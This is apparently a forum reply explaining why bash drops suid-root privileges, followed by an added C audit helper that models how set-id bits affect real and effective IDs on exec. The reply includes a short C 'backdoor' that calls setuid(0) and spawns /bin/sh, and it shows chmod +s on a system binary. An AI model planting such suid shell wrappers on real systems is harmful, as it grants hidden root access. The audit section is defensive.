Because the suid bit influences only the effective UID, and somewhere in the
bash code there is a setuid(getuid()) to drop root rights (if executed by non-root).
Try /bin/bash1 (I have this on my Slack 8) or another shell; they might give you your
expected rootshell.
Look at this:

    bash-2.05# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),16(halt)
    bash-2.05# chmod +s /usr/bin/id
    bash-2.05# exit
    bash-2.05$ id
    uid=1000(spacewalker) gid=100(users) euid=0(root) egid=1(bin) groups=100(users),16(halt)

If you want to program a little backdoor that gives you a rootshell, you have to set
your uid to 0. The kernel will give you uid 0 because you have euid 0 in
effect:
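
    #include <stdio.h>
    #include <stdlib.h>   /* system() */
    #include <unistd.h>   /* setuid(), getuid() */

    int main(void)
    {
        /* succeeds only when the effective uid is already 0 (binary is suid root) */
        setuid(0);
        if (getuid()) {
            /* real uid is still non-zero */
            printf("program not suid root\n");
        } else {
            system("/bin/sh");
        }
        return 0;
    }
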
I hope this answers your question...
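
Added example, not part of the original post: an audit helper in C that models which real and effective IDs a set-id file confers on exec, and whether a shell that compares real and effective uid (the bash behaviour the post describes) would drop them. The names ids_after_exec, shell_would_drop and audit_path are hypothetical, and the model assumes Linux semantics without nosuid mounts or capabilities.

```c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* IDs a process holds after execve() of a file (simplified model). */
struct exec_ids { uid_t ruid, euid; gid_t rgid, egid; };

/* Set-id bits replace only the EFFECTIVE ids; real ids stay the caller's. */
struct exec_ids ids_after_exec(mode_t mode, uid_t owner, gid_t group,
                               uid_t caller_uid, gid_t caller_gid)
{
    struct exec_ids r = { caller_uid, caller_uid, caller_gid, caller_gid };
    if (mode & S_ISUID)
        r.euid = owner;
    /* Linux: setgid without group-execute is not honoured as set-id on exec */
    if ((mode & S_ISGID) && (mode & S_IXGRP))
        r.egid = group;
    return r;
}

/* A shell that resets euid to the real uid does so when the two differ. */
int shell_would_drop(struct exec_ids ids)
{
    return ids.ruid != ids.euid;
}

/* Returns 1 if exec of path changes the caller's effective ids,
 * 0 if not, -1 if the file cannot be examined. */
int audit_path(const char *path, uid_t caller_uid, gid_t caller_gid)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    struct exec_ids r = ids_after_exec(st.st_mode, st.st_uid, st.st_gid,
                                       caller_uid, caller_gid);
    int changed = (r.euid != caller_uid) || (r.egid != caller_gid);
    printf("%s: mode=%04o euid=%u egid=%u%s\n", path,
           (unsigned)(st.st_mode & 07777), (unsigned)r.euid, (unsigned)r.egid,
           changed ? "  <-- set-id, review" : "");
    return changed;
}

int main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++)      /* e.g. ./audit /usr/bin/id /bin/sh */
        audit_path(argv[i], getuid(), getgid());
    return 0;
}
```

With the values from the session above (file owned by root:bin, both set-id bits, caller 1000/100) the model yields euid 0 and egid 1 while the real ids stay 1000/100, which matches the id output.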